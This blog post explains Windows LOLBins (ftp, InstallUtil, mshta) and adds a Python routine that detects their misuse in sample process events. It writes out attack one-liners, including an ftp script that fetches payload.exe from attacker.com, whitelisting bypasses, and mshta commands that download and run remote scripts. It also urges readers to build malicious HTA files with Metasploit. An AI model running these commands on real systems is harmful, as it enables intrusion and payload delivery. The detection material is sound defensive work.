It's time to look into LOLBins, and have some fun with that. So what are they? They are system files and commands that can be used in a malicious way as part of a cyber attack chain. So, they're the kind of files you want to monitor: when they're called, and who calls them. And why does it matter? Because some of them can download and upload files, be used for evading antivirus, and a lot more.
It's a tactic known as Living Off The Land (using what's at hand) to attack a system. And here PowerShell and WMIC also come into play, as they are installed on every Windows system, so they really are a hacker's best friend, at least for now. And why? Because, sad to say, PowerShell was never designed with security in mind, but simply as an easy way for administrators to do their job. So, if attacking a system is your fancy, I really would recommend you look into PowerShell programming :)
So, let's look into a couple of LOLBins, just to gain an understanding of what they do and how they work. There's a lot of them, all documented here.
One LOLBin is the FTP command:
# write !calc.exe into the file ftpcommands.txt and call ftp to execute the command
echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
# or call the command directly from inside the ftp client with !calc.exe
#download with ftp
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Next up in the list is InstallUtil. It can bypass application whitelisting (AWL) and execute DLL and EXE files.
# Execute DLL and bypass AWL
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
# Execute exe and bypass AWL
InstallUtil.exe /logfile= /LogToConsole=false /U evil_payload.exe
And last, let's look into mshta.exe:
# Execute hta file
mshta.exe evilfile.hta
# Download and Execute HTA file
mshta.exe https://webserver/evilfile.hta
# Download and Execute VBScript
mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
# Download and Execute Javascript
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
# Get file from ADS, and execute
mshta.exe "C:\ads\file.txt:file.hta"
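Since the whole point of knowing these binaries is to monitor them, here is a small detection routine that runs over process-creation events and flags exactly the three patterns shown above: ftp.exe reading a command script (-s:), InstallUtil.exe run with /U and logging suppressed, and mshta.exe given a URL, an inline script: protocol, or an alternate data stream path. This is an added example written for this post, not code from the LOLBAS project; the events are constructed, the field names (Image, CommandLine) follow the Sysmon Event ID 1 layout as an assumption, and the rule names are my own.

```python
import re

# Constructed sample process-creation events in a Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\ftp.exe",
     "CommandLine": "ftp -s:ftpcommands.txt"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": "InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://webserver/evilfile.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\ads\file.txt:file.hta"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},  # local HTA, not flagged by these rules
    {"Image": r"C:\Windows\System32\ftp.exe",
     "CommandLine": "ftp ftp.example.com"},                             # interactive ftp, no script file
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]


def image_name(event):
    """Return the lower-cased file name of the launched image."""
    return event["Image"].rsplit("\\", 1)[-1].lower()


def check_ftp(cmd):
    # -s:<file> makes ftp.exe read commands from a file; '!' lines in that file spawn processes.
    if re.search(r"(?i)(?:^|\s)-s:\S+", cmd):
        return ["ftp_script_file"]
    return []


def check_installutil(cmd):
    hits = []
    # /U runs the uninstaller entry point of whatever assembly is named on the command line.
    if re.search(r"(?i)(?:^|\s)/U(?:\s|$)", cmd):
        hits.append("installutil_uninstall")
    # An empty /logfile= or /LogToConsole=false suppresses the install log a defender would read.
    if re.search(r"(?i)/logfile=(?:\s|$)|/LogToConsole=false", cmd):
        hits.append("installutil_logging_suppressed")
    return hits


def check_mshta(cmd):
    hits = []
    if re.search(r"(?i)\bhttps?://", cmd):                 # HTA fetched from a web server
        hits.append("mshta_remote_url")
    if re.search(r"(?i)\b(?:vbscript|javascript):", cmd):  # inline script via a protocol handler
        hits.append("mshta_inline_script")
    # Drive-letter path with a second ':' after the file name, i.e. an NTFS alternate data stream.
    if re.search(r'[A-Za-z]:\\[^\s":]*:[^\s"\\]+', cmd):
        hits.append("mshta_alternate_data_stream")
    return hits


CHECKS = {"ftp.exe": check_ftp, "installutil.exe": check_installutil, "mshta.exe": check_mshta}


def classify(event):
    """Return the list of rule names that match one event (empty if none)."""
    check = CHECKS.get(image_name(event))
    return check(event["CommandLine"]) if check else []


def scan(events):
    """Return (image, command line, rule names) for every event that matched at least one rule."""
    return [(image_name(e), e["CommandLine"], hits) for e in events if (hits := classify(e))]


if __name__ == "__main__":
    for image, cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{image:16} {', '.join(hits):45} {cmd}")
```

The local-HTA event is left unflagged on purpose: mshta.exe running a file on disk is also what legitimate installers do, so that case is better judged against a parent-process baseline (which the sample records do not carry) than by command line alone. The ADS rule fires on the path shape only, so pair it with a file-system check before treating it as more than a lead.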
So, something to play around with, to see how it all works. Try to load up the Metasploit Framework and generate a malicious HTA and see if it executes, or try to combine this with PowerShell, HID attacks, and HID injection with Logitacker, and you'll see what I mean: there's fun times ahead :)
You can find a writeup of how this is used in malware attacks here: https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/
Have fun :)